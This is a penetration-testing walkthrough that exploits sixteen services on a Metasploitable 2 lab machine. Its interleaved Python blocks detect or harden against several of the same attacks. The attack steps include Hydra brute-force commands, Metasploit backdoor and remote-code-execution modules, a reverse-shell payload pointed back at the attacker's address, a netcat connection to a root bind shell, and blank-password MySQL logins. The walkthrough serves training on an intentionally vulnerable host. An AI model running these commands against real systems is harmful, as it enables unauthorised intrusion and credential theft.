
Exploiting All Ports in Different Techniques



  • In this section we will exploit the active ports using different techniques.
  • The ports we are trying to exploit are FTP, SSH, TELNET, SMTP, NETBIOS-SSN, JAVA RMI, BINDSHELL, ProFTPD, MYSQL, DISTCCD, POSTGRESQL, VNC, X11, UnrealIRCD, TOMCAT, RUBY-DRB.

1. 21-FTP

  • Method 1:

Log in with "anonymous" as the username and no password.

If you need more info about Anonymous FTP you can find it here.

https://whatis.techtarget.com/definition/anonymous-FTP-File-Transfer-Protocol

ftp 192.168.0.130


  • Method 2 :

Brute-force with Hydra; you need wordlists of candidate usernames and passwords.

hydra -L /root/Desktop/USERNAMES.txt -P /root/Desktop/PASSWORDS.txt <Target IP Address> ftp -V


It will take each username and password from the given files and try to log in to the target FTP service.

Once you have found valid credentials you can log in directly.


After logging in to a user account, you can get root access through privilege escalation.

  • Method 3 :

Exploiting FTP through the Metasploit framework

Open the Metasploit framework console and search for the vsftpd backdoor exploit:

msfconsole

search vsftpd

use exploit/unix/ftp/vsftpd_234_backdoor

show options

set RHOSTS 192.168.0.130   --> <target IP address>

exploit

Congratulations, you have root access.

2. 22-SSH

Secure Shell (SSH) is a cryptographic network protocol for operating network services securely over an unsecured network.

Exploiting SSH in Different Techniques

  • Method 1

Cracking the username and password with Hydra

Hydra is a tool bundled with Kali Linux for brute-force attacks. A brute-force attack is a trial-and-error method used by application programs to decode encrypted data such as passwords or Data Encryption Standard (DES) keys through exhaustive effort (using brute force) rather than employing intellectual strategies.

hydra -L <Usernames_List> -P <Passwords_List> <Target ip address> <Service>
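Brute-force logins like the Hydra runs above against FTP and SSH leave a dense trail of failed authentications from a single source. The following is an added example, not code from the original post: it parses constructed sshd lines in the /var/log/auth.log syslog format and flags any source address with five or more failures inside one minute, also reporting which account that address subsequently logged into, since those credentials should be treated as compromised. The sample log lines, the year (syslog omits it) and the thresholds are assumptions; the same structure works for an FTP daemon's log with a different regular expression.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in the syslog format sshd writes to /var/log/auth.log
# (syslog omits the year, so the parser takes one as a parameter).
SAMPLE_AUTH_LOG = """\
Mar  3 10:00:01 metasploitable sshd[2301]: Failed password for invalid user admin from 192.168.0.109 port 40122 ssh2
Mar  3 10:00:02 metasploitable sshd[2303]: Failed password for invalid user test from 192.168.0.109 port 40124 ssh2
Mar  3 10:00:02 metasploitable sshd[2305]: Failed password for root from 192.168.0.109 port 40126 ssh2
Mar  3 10:00:03 metasploitable sshd[2307]: Failed password for msfadmin from 192.168.0.109 port 40128 ssh2
Mar  3 10:00:03 metasploitable sshd[2309]: Failed password for user from 192.168.0.109 port 40130 ssh2
Mar  3 10:00:04 metasploitable sshd[2311]: Failed password for msfadmin from 192.168.0.109 port 40132 ssh2
Mar  3 10:00:05 metasploitable sshd[2313]: Accepted password for msfadmin from 192.168.0.109 port 40134 ssh2
Mar  3 10:07:30 metasploitable sshd[2401]: Failed password for msfadmin from 192.168.0.50 port 51000 ssh2
Mar  3 10:07:45 metasploitable sshd[2403]: Accepted password for msfadmin from 192.168.0.50 port 51002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_auth_log(text, year=2024):
    """Return a list of (timestamp, source_ip, username, accepted) tuples."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated sshd/PAM lines are ignored
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"], m["result"] == "Accepted"))
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(minutes=1)):
    """Flag source IPs with at least `threshold` failed logins inside `window`.

    For each flagged IP the result records how many failures were seen, how
    many distinct usernames were tried (a username wordlist shows up here),
    and which accounts it later logged into, i.e. credentials to treat as burned.
    """
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[1]].append(ev)

    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda ev: ev[0])
        failures = [ts for ts, _, _, ok in evs if not ok]
        burst_start = None
        for i in range(len(failures)):
            # count failures that fall within `window` of failure i
            in_window = sum(1 for ts in failures[i:] if ts - failures[i] <= window)
            if in_window >= threshold:
                burst_start = failures[i]
                break
        if burst_start is None:
            continue
        findings[ip] = {
            "failures": len(failures),
            "distinct_users": len({u for _, _, u, _ in evs}),
            "success_after_burst": sorted({u for ts, _, u, ok in evs if ok and ts >= burst_start}),
        }
    return findings


if __name__ == "__main__":
    for ip, info in detect_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(ip, info)
```

On the constructed sample, 192.168.0.109 is reported with six failures across five usernames and a later successful login as msfadmin, while 192.168.0.50 (one typo followed by a success) is not; the threshold and window are the knobs to tune against your own baseline of legitimate failures.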


  • Method 2

  1. Open the Metasploit framework
  2. Open a terminal and type these commands:

service postgresql start

msfconsole

search ssh_login

use auxiliary/scanner/ssh/ssh_login


  3. Set this auxiliary module's options and see what it requires.

set RHOSTS <target IP Address>   --> in my case 192.168.0.130


  4. Set the username list and password list

set USER_FILE <Username file path>

set PASS_FILE <Password file path>

exploit

It will take some time depending on the size of your username and password lists, and it will report each username and password that succeed. Log in with those credentials.

ssh username@targetipaddress


You now have user access but cannot perform all tasks, so try to get root access through privilege escalation.

3. 23-TELNET

Telnet is a simple, text-based network protocol that is used for accessing remote computers over TCP/IP networks like the Internet. Telnet was created and launched in 1969 and, historically speaking, you can say that it was the first Internet.

telnet <target IP Address> --> 192.168.0.130


By default the Metasploitable 2 banner is shown on connection; it says to log in with msfadmin/msfadmin to get started. Enter those credentials and you are in.

4. 25-SMTP

SMTP is part of the application layer of the TCP/IP protocol. Using a process called “store and forward,” SMTP moves your email on and across networks. It works closely with something called the Mail Transfer Agent (MTA) to send your communication to the right computer and email inbox.

  • Method 1:

  1. Using Metasploit
  2. Start Metasploit by executing the commands:

service postgresql start

msfconsole -q

search smtp_version


use auxiliary/scanner/smtp/smtp_version   (or) you can type: use 0

show options

set RHOST 192.168.0.130

exploit (or) run


SMTP stands for Simple Mail Transfer Protocol and is a server-to-server protocol that keeps a local database of users to which it must send and receive emails.

SMTP has a set of commands. We are going to connect to our target with netcat on port 25 and try to acquire this database of email users.

  3. Open a new terminal and type:

nc 192.168.0.130 25


Now that the connection is established, you can verify users with the SMTP commands. Type:

vrfy user

(This is a non-interactive session: type one command per line and read the server's numeric reply.)


For SMTP Commands Visit: http://www.tcpipguide.com/free/t_SMTPCommands-2.htm
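The VRFY probing above works because the server answers differently for mailboxes that exist and ones that do not. The following added example (mine, not the post's) simulates both sides of that exchange in Python: a server that discloses, the hardened behaviour RFC 5321 allows (a blanket 252 reply, which is what Postfix's disable_vrfy_command = yes produces), and a simple detection rule for a session that issues many VRFY commands without ever attempting delivery. The user table and hostname are constructed.

```python
from collections import Counter

# Constructed local user table and hostname for the simulated server.
KNOWN_USERS = {"root", "msfadmin", "user", "postgres"}
HOSTNAME = "mail.example.test"


def handle_vrfy(argument, users=KNOWN_USERS, disclose=True):
    """Simulate an SMTP server's reply to 'VRFY <name>'.

    disclose=True mirrors the behaviour abused above: the server confirms or
    denies each mailbox, so every VRFY is a yes/no oracle for usernames.
    disclose=False is the hardened behaviour RFC 5321 permits: always answer
    252, which reveals nothing about whether the mailbox exists.
    """
    name = argument.strip()
    if not name:
        return "501 5.5.4 Syntax: VRFY address"
    if not disclose:
        return "252 2.5.2 Cannot VRFY user, but will accept message and attempt delivery"
    if name in users:
        return f"250 2.1.5 <{name}@{HOSTNAME}>"
    return f"550 5.1.1 <{name}@{HOSTNAME}>: Recipient address rejected: User unknown"


def run_session(client_lines, disclose=True):
    """Replay a client's command lines; return [(command, server_reply), ...]."""
    transcript = [("", f"220 {HOSTNAME} ESMTP")]  # greeting banner
    for line in client_lines:
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "VRFY":
            reply = handle_vrfy(arg, disclose=disclose)
        elif verb in ("HELO", "EHLO"):
            reply = f"250 {HOSTNAME}"
        elif verb in ("MAIL", "RCPT"):
            reply = "250 2.1.0 Ok"
        elif verb == "QUIT":
            reply = "221 2.0.0 Bye"
        else:
            reply = "502 5.5.2 Error: command not recognized"
        transcript.append((line, reply))
    return transcript


def enumerated_users(transcript):
    """What the probing client learns: names confirmed by a 250 reply to VRFY."""
    found = []
    for cmd, reply in transcript:
        if cmd.upper().startswith("VRFY ") and reply.startswith("250"):
            found.append(cmd.split(" ", 1)[1].strip())
    return found


def looks_like_enumeration(transcript, threshold=3):
    """Detection: many VRFY commands and no MAIL FROM in the same session is
    a user-enumeration pattern, not a mail client delivering a message."""
    verbs = Counter(cmd.split(" ", 1)[0].upper() for cmd, _ in transcript if cmd)
    return verbs["VRFY"] >= threshold and verbs["MAIL"] == 0


# Constructed probe session of the kind the netcat step above produces.
PROBE = ["HELO client.example.test", "VRFY root", "VRFY msfadmin",
         "VRFY admin", "VRFY user", "QUIT"]

if __name__ == "__main__":
    for cmd, reply in run_session(PROBE):
        print(f"C: {cmd}" if cmd else "", f"S: {reply}", sep="\n")
    print("disclosed:", enumerated_users(run_session(PROBE)))
    print("hardened :", enumerated_users(run_session(PROBE, disclose=False)))
```

With disclosure on, the probe confirms root, msfadmin and user; with the hardened 252 reply the same probe learns nothing, and the session still trips the enumeration rule so it can be logged or rate-limited.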

  • Method 2

  1. Using smtp_enum
  2. This can be done with Metasploit:

search smtp_enum


use auxiliary/scanner/smtp/smtp_enum


show options

set RHOST 192.168.0.130

exploit


This method uses enumeration to find the list of users known to the SMTP service.

Later, netcat can be helpful for getting a reverse connection as one of those users.

5. 139&445 Netbios-SSN

Samba is an open-source project that is widely used on Linux and Unix computers so they can work with Windows file and print services.

We can even use Samba as an Active Directory server to handle login, authentication and access control for a Windows network.

Search for the exploit:

use exploit/multi/samba/usermap_script


To view the options for the exploit:

show options

set RHOST 192.168.0.130   (target IP address)

Set the payload:

show payloads

set payload cmd/unix/reverse


Set the required arguments for the payload:

show options

set LHOST 192.168.0.109   (attacker's IP address)

set LPORT 4444


Check once more that all required arguments are filled in, then run:

exploit

6. 1099-Java-RMI

Remote Method Invocation (RMI) is an API that allows an object to invoke a method on an object that exists in another address space, which could be on the same machine or a remote machine.

Exploiting the Java RMI server

Search for the exploit:

search java_rmi_server


Choose the exploit according to its rank; for instance, a module ranked "excellent" works more reliably than one ranked "normal".

use exploit/multi/misc/java_rmi_server

show options

set RHOSTS <target's IP>

exploit


We got access to the target machine.

7. 1524-BINDSHELL

A bind shell is a type of shell in which the target (victim) machine opens a communication port, i.e. a listener, and waits for an incoming connection. The attacker then connects to that listener, which leads to code or command execution on the target.

  • Exploitation

It is a root shell, so we can connect to it with netcat.

nc <target ip address> 1524


Congratulations, you are a root user now.
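A bind shell of the kind above is easy to spot from the host side, because a shell or netcat process owns a listening TCP socket. The following added example (not from the post) parses constructed `ss -ltnp` output and reports listeners whose owning process is shell-like, plus any listener bound to all interfaces that is not in an expected port baseline. Process names, ports and the baseline set are assumptions you would adapt to your own host.

```python
import re

# Process names that should never own a listening TCP socket on a server:
# a shell or netcat bound to a port is the textbook bind shell.
SHELL_LIKE = {"sh", "bash", "dash", "zsh", "ksh", "nc", "ncat", "netcat", "socat"}
ANY_ADDR = {"0.0.0.0", "*", "::", "[::]"}

# Constructed sample of `ss -ltnp` output; not captured from a real host.
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128          0.0.0.0:22         0.0.0.0:*     users:(("sshd",pid=812,fd=3))
LISTEN 0      10           0.0.0.0:1524       0.0.0.0:*     users:(("sh",pid=1337,fd=4))
LISTEN 0      50           0.0.0.0:3306       0.0.0.0:*     users:(("mysqld",pid=901,fd=10))
LISTEN 0      5          127.0.0.1:6010       0.0.0.0:*     users:(("sshd",pid=2210,fd=9))
LISTEN 0      50                 *:8787             *:*     users:(("ruby",pid=950,fd=5))
"""

# One listener per line: state, queues, local addr:port, peer, owning process.
LISTENER_RE = re.compile(
    r'^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)


def parse_listeners(ss_output):
    """Parse `ss -ltnp` lines into dicts with addr, port, proc and pid."""
    listeners = []
    for line in ss_output.splitlines():
        m = LISTENER_RE.match(line)
        if m:
            listeners.append({"addr": m["addr"], "port": int(m["port"]),
                              "proc": m["proc"], "pid": int(m["pid"])})
    return listeners


def find_suspicious_listeners(listeners, baseline_ports):
    """Return listeners worth investigating, each with the reasons.

    baseline_ports is the set of ports this host is expected to expose;
    anything else bound to every interface is reported, and a shell-like
    process owning a socket is reported regardless of port.
    """
    findings = []
    for l in listeners:
        reasons = []
        if l["proc"] in SHELL_LIKE:
            reasons.append("shell-like process owns a listening socket (bind shell)")
        if l["addr"] in ANY_ADDR and l["port"] not in baseline_ports:
            reasons.append("listening on all interfaces outside the port baseline")
        if reasons:
            findings.append({**l, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_listeners(parse_listeners(SAMPLE_SS_OUTPUT), {22, 3306}):
        print(f"{f['addr']}:{f['port']} {f['proc']}[{f['pid']}] -> {'; '.join(f['reasons'])}")
```

On the sample, port 1524 owned by sh is reported for both reasons, the loopback-only 6010 listener is ignored, and the ruby listener on 8787 is reported only because it is outside the baseline; once you know it is expected, adding it to the baseline silences it.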

8. 2121-ProFTPD

Before exploiting this port you need login credentials; as we saw earlier, you can obtain them with a brute-force technique. We can access ProFTPD with telnet; here we use user:user.

telnet <Target IP Address> <Port Number>

USER <username>

PASS <password>


This is a normal user; try privilege escalation to gain root control.

9. 3306-MYSQL

  • Method 1:

Search for the module:

search scanner/mysql/mysql_login


use auxiliary/scanner/mysql/mysql_login


Sometimes MySQL may have a blank password, so we can exploit it directly.

Note: by default the module shows BLANK_PASSWORDS as false; set it to true.

set BLANK_PASSWORDS true

set RHOSTS <target-ip>

run


  • Method 2:

In this method we connect to MySQL directly with the mysql client, giving the username root and the target's IP (this succeeds when root has a blank password):

mysql -u root -h <target's IP>


10. 3632-DISTCCD

Distcc is a tool for speeding up the compilation of source code by using distributed computing over a computer network. With the right configuration, distcc can dramatically reduce a project's compilation time.

  • Exploiting port 3632 using distcc_exec

Open msfconsole and search for distcc_exec:

search distcc_exec

use exploit/unix/misc/distcc_exec

show options

Set the required arguments and run the exploit:

set RHOSTS <target-ip>

exploit


We got shell access; try privilege escalation for higher privileges.

11. 5432-PostgreSQL

Exploiting PostgreSQL with postgres_payload

  • Open msfconsole and search for postgres_payload

search postgres_payload

use exploit/linux/postgres/postgres_payload

show options


Set the required arguments for the exploit:

set RHOSTS <target-ip>

By default it uses the username postgres.

exploit


Successfully logged in to PostgreSQL. Let's get a shell to do more...


Try privilege escalation. Happy learning!

12. 5900-VNC

  • Open msfconsole and search for the vnc_login module

search vnc_login

use auxiliary/scanner/vnc/vnc_login


show options

set RHOSTS <target's IP>

set PASS_FILE <file path that contains passwords>

run (or) exploit


This method is used against VNC servers hosted on Linux, Unix or Windows operating systems that have an authentication weakness (a guessable password).

Try to connect to VNC with that password:

Open VNC Viewer from the terminal, type the IP address and connect.

A login prompt pops up and asks you to provide credentials.


Then Enter the password and click OK.


Voilà! You got access. I know what you are thinking right now; don't mess with the things around. Happy learning.

13. 6000-X11

The X Window System (aka X) is a windowing system for bitmap displays, which is common on UNIX-based operating systems. X provides the basic framework for a GUI based environment.

The remote X11 server accepts connections from anywhere one can get an Internet connection. It is responsible for access to the graphics cards, the input devices, and the display screen on either computer or wireless device.

  • Exploiting port 6000 using ssh

ssh -X -l msfadmin 192.168.0.122

In the above command, -X enables X11 forwarding over the SSH session; supplying the username and the target's IP gives us a shell.
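The SSH sections above rely on password logins being enabled and, here, on X11 forwarding being allowed by the server. The following added example (mine, not from the post) parses sshd_config the way sshd does (the first occurrence of a keyword wins, and only settings before any Match block are global) and reports the weak settings next to the values that close each avenue. The two configuration fragments are constructed; the defaults table reflects current OpenSSH server defaults.

```python
# OpenSSH server defaults for the keywords audited here (the value that
# applies when the keyword is absent from sshd_config).
SSHD_DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "pubkeyauthentication": "yes",
    "x11forwarding": "no",
    "maxauthtries": "6",
}

# Constructed configs for demonstration (not from the page or any real host).
WEAK_SSHD_CONFIG = """\
# lab server: everything open
Port 22
PermitRootLogin yes
PasswordAuthentication yes
X11Forwarding yes
MaxAuthTries 10
"""

HARDENED_SSHD_CONFIG = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
X11Forwarding no
MaxAuthTries 3
"""


def parse_sshd_config(text):
    """Return {keyword_lower: value} following sshd's rules: comments and
    blank lines are ignored and the FIRST occurrence of a keyword wins.
    Parsing stops at the first Match block, whose settings are conditional."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "match":
            break
        settings.setdefault(key, value)
    return settings


def audit_sshd_config(text):
    """Return findings as (keyword, effective_value, reason) tuples."""
    settings = parse_sshd_config(text)

    def effective(key):
        return settings.get(key, SSHD_DEFAULTS[key]).lower()

    findings = []
    if effective("permitrootlogin") == "yes":
        findings.append(("PermitRootLogin", "yes",
                         "root can be password-guessed directly; use 'no' or 'prohibit-password'"))
    if effective("passwordauthentication") == "yes":
        findings.append(("PasswordAuthentication", "yes",
                         "online password guessing is possible; prefer keys and set 'no'"))
    if effective("x11forwarding") == "yes":
        findings.append(("X11Forwarding", "yes",
                         "a compromised server can reach the connecting client's X display; set 'no' unless required"))
    tries = int(effective("maxauthtries"))
    if tries > 6:
        findings.append(("MaxAuthTries", str(tries),
                         "more guesses per connection than the default of 6"))
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_SSHD_CONFIG), ("hardened", HARDENED_SSHD_CONFIG)):
        print(name, audit_sshd_config(cfg) or "no findings")
```

Note that an empty file still yields one finding, because PasswordAuthentication defaults to yes; an audit that only looks at what is written, rather than what is in effect, misses exactly that case.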


14. 6667 & 6697 UnrealIRCD

  1. UnrealIRCd is an Open Source IRC Server, serving thousands of networks since 1999. It runs on Linux, OS X, and Windows
  2. UnrealIRCd is a highly advanced IRCd with a strong focus on modularity, an advanced and highly configurable configuration file. Key features include SSL
  3. UnrealIRCd is one of the most popular and full-featured IRC daemons and is used on the largest number of IRC servers
  4. This server is described as having possibly the most security features of any IRC server.
  5. Protocols used: Internet Relay Chat
  6. Let’s Exploit this IRC Server.

  • Method 1: on port 6667

search unrealircd

use exploit/unix/irc/unreal_ircd_3281_backdoor

show options


Set the required arguments for the exploit:

set RHOSTS <target-ip>

By default the module targets port 6667.

run (or) exploit


Hey, we got root! We are living on the edge...

  • Method 2: On port 6697

  1. Use the above exploit and set the required arguments
  2. This time set the port to 6697

set RHOSTS <target-ip>

set RPORT 6697


And the second time we also got root. Try to exploit this yourself. Happy learning!

15. 8180-TOMCAT

Apache Tomcat is an open-source implementation of the Java Servlet, JavaServer Pages, Java Expression Language, and WebSocket technologies. Tomcat provides a “pure Java” HTTP web server environment in which Java code can run.

  • Exploiting Apache Tomcat

It can be completed in two steps:

  1. Open msfconsole and search for tomcat_mgr_login

search tomcat_mgr_login

use auxiliary/scanner/http/tomcat_mgr_login

set RHOSTS <target-ip>


show options

The module ships with default username and password lists. After setting the arguments, type exploit (or) run:

run


Take the username and password it finds and give them to the next exploit.

  2. Search for the Tomcat manager upload exploit:

search tomcat_mgr_upload

use exploit/multi/http/tomcat_mgr_upload

show options


Set RHOSTS, RPORT, HttpUsername and HttpPassword (the credentials found by the tomcat_mgr_login module), then run the exploit.


msfconsole assigns a suitable default payload to the exploit, which is why we got a Meterpreter session.
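The tomcat_mgr_login and tomcat_mgr_upload steps above show up in Tomcat's access log as a burst of 401 responses on /manager/ from one address, then a 200 carrying a username, then a deployment request. The following added example (not part of the post) parses constructed access-log lines in the default AccessLogValve pattern and reports addresses that reached a guessing threshold, together with the account that succeeded and any deployments that followed. The log lines, the CSRF nonce value and the threshold are constructed.

```python
import re
from collections import defaultdict

# Constructed Tomcat access log lines in the default AccessLogValve pattern
# "%h %l %u %t "%r" %s %b"; not captured from a real host. The nonce value is a
# placeholder.
SAMPLE_ACCESS_LOG = """\
192.168.0.109 - - [03/Mar/2024:10:15:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.168.0.109 - - [03/Mar/2024:10:15:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.168.0.109 - - [03/Mar/2024:10:15:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.168.0.109 - - [03/Mar/2024:10:15:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.168.0.109 - - [03/Mar/2024:10:15:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.168.0.109 - - [03/Mar/2024:10:15:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.168.0.109 - tomcat [03/Mar/2024:10:15:04 +0000] "GET /manager/html HTTP/1.1" 200 15431
192.168.0.109 - tomcat [03/Mar/2024:10:15:09 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=PLACEHOLDER HTTP/1.1" 200 15602
192.168.0.50 - tomcat [03/Mar/2024:11:02:10 +0000] "GET /manager/html HTTP/1.1" 200 15431
192.168.0.77 - - [03/Mar/2024:11:05:00 +0000] "GET /index.jsp HTTP/1.1" 200 11156
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Manager endpoints that deploy a new application: the HTML form upload and
# the text/script interface used by tooling.
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy", "/manager/deploy")


def parse_access_log(text):
    """Return one dict per parsable line; the query string is dropped from path."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            entries.append({
                "ip": m["ip"], "user": m["user"], "method": m["method"],
                "path": m["path"].split("?", 1)[0], "status": int(m["status"]),
            })
    return entries


def detect_manager_abuse(entries, guess_threshold=5):
    """Per source IP, count 401s on /manager/*, note the first account that then
    succeeded, and collect deployment requests. Report IPs whose failures reach
    guess_threshold; success_user and deploys show how far the activity got."""
    state = defaultdict(lambda: {"failed": 0, "success_user": None, "deploys": []})
    for e in entries:
        if not e["path"].startswith("/manager/"):
            continue
        s = state[e["ip"]]
        if e["status"] == 401:
            s["failed"] += 1
        elif e["status"] == 200:
            if s["success_user"] is None and e["user"] != "-":
                s["success_user"] = e["user"]
            if e["path"].startswith(DEPLOY_PATHS) and e["method"] in ("POST", "PUT"):
                s["deploys"].append(e["path"])
    return {ip: s for ip, s in state.items() if s["failed"] >= guess_threshold}


if __name__ == "__main__":
    for ip, info in detect_manager_abuse(parse_access_log(SAMPLE_ACCESS_LOG)).items():
        print(ip, info)
```

On the sample, 192.168.0.109 is reported with six failures, a success as tomcat and one upload; the administrator at 192.168.0.50 who logs in cleanly is not, and the unrelated index.jsp request never enters the manager tally.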

16. 8787-Ruby-drb

  • dRuby is a distributed object system for Ruby. It is written in pure Ruby and uses its own protocol.
  • No add-on services are needed beyond those provided by the Ruby runtime, such as TCP sockets.

search drb_remote_codeexec

use exploit/linux/misc/drb_remote_codeexec

Set the required arguments for the exploit:

show options

set RHOSTS <target-ip>

exploit (or) run

Voilà, you got a root shell. Try some shell commands.


Thank You!!!!!!! 
